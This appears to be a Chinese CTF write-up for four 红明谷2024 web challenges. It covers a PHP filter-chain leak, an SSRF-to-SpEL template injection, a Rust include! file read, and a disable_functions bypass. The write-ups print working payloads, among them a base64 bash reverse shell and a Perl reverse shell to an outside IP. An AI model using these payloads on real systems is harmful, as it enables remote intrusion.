红明谷2024 WEB AK

Simp1escape一血,ak没有其他方向一题分高,止步16名

0x01 ezphp

使用https://github.com/synacktiv/php_filter_chains_oracle_exploit leak flag.php的字符

发现存在ezphpPhp8参数传入后显示代码,然后进行利用,触发匿名类即可

flag.php?ezphpPhp8=class%40anonymous%00/var/www/html/flag.php%3A7%240

0x02 Simp1escape

AdminController 模板注入,需要本地访问,可以通过curl路由传入请求地址,虽然有本地地址的限制但是通过302跳转到本地地址即可完成利用

/curl?url=http://d6ore2vr.requestrepo.com
跳转地址
http://127.0.0.1:8080/getsites?hostname=%5B%5B%24%7BT(java.lang.Boolean).forName(%22com.fasterxml.jackson.databind.ObjectMapper%22).newInstance().readValue(%22%7B%7D%22%2CT(org.springframework.expression.spel.standard.SpelExpressionParser)).parseExpression(%22T(Runtime).getRuntime().exec('bash%20-c%20%7Becho%2Cc2ggLWkgPiYgL2Rldi90Y3AvMTI0LjIyMC42OC41Ny8yMzMzIDA%2BJjE%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D')%22).getValue()%7D%5D%5D

明显的模板注入,但是限制只能由本地进行访问

99360-b1oru51gdjc.png

curlController中会进行访问,并且会生成文件

16199-itijjysd1xm.png

存在限制,不允许访问本地地址

39821-nsqt09eksv.png

使用302 跳转绕过,最后打模板注入即可,ssrf + ssti,应该是非预期

0x03 playground

#[macro_use] extern crate rocket;

use std::fs;
use std::fs::File;
use std::io::Write;
use std::process::Command;
use rand::Rng;

#[get("/")]
fn index() -> String {
    fs::read_to_string("main.rs").unwrap_or(String::default())
}

#[post("/rust_code", data = "<code>")]
fn run_rust_code(code: String) -> String{
    if code.contains("std") {
        return "Error: std is not allowed".to_string();
    }
    //generate a random 5 length file name
    let file_name = rand::thread_rng()
        .sample_iter(&rand::distributions::Alphanumeric)
        .take(5)
        .map(char::from)
        .collect::<String>();
    if let Ok(mut file) = File::create(format!("playground/{}.rs", &file_name)) {
        file.write_all(code.as_bytes());
    }
    if let Ok(build_output) = Command::new("rustc")
        .arg(format!("playground/{}.rs",&file_name))
        .arg("-C")
        .arg("debuginfo=0")
        .arg("-C")
        .arg("opt-level=3")
        .arg("-o")
        .arg(format!("playground/{}",&file_name))
        .output() {
        if !build_output.status.success(){
            fs::remove_file(format!("playground/{}.rs",&file_name));
            return String::from_utf8_lossy(build_output.stderr.as_slice()).to_string();
        }
    }
    fs::remove_file(format!("playground/{}.rs",&file_name));
    if let Ok(output) = Command::new(format!("playground/{}",&file_name))
        .output() {
        if !output.status.success(){
            fs::remove_file(format!("playground/{}",&file_name));
            return String::from_utf8_lossy(output.stderr.as_slice()).to_string();
        } else{
            fs::remove_file(format!("playground/{}",&file_name));
            return String::from_utf8_lossy(output.stdout.as_slice()).to_string();
        }
    }
    return String::default();

}

#[launch]
fn rocket() -> _ {
    let figment = rocket::Config::figment()
        .merge(("address", "0.0.0.0"));
    rocket::custom(figment).mount("/", routes![index,run_rust_code])
}

/rust_code 路由可以执行任意rust代码,可以采用include直接包含文件即可

fn main() {

    include!("/flag");
}

0x04 unauth

www.zip 下载有用户密码,登录后可以eval,有disable func,使用pcntl_exec反弹shell

?cmd=pcntl_exec('/usr/bin/perl',['-e','use Socket;$i="124.220.68.57";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};']);

登录后发现发现权限不对,切换到admin来读取flag,admin密码在config.ini.php中

添加新评论

文章状态:未收录,已推送~ 【今日剩余额度:10 条】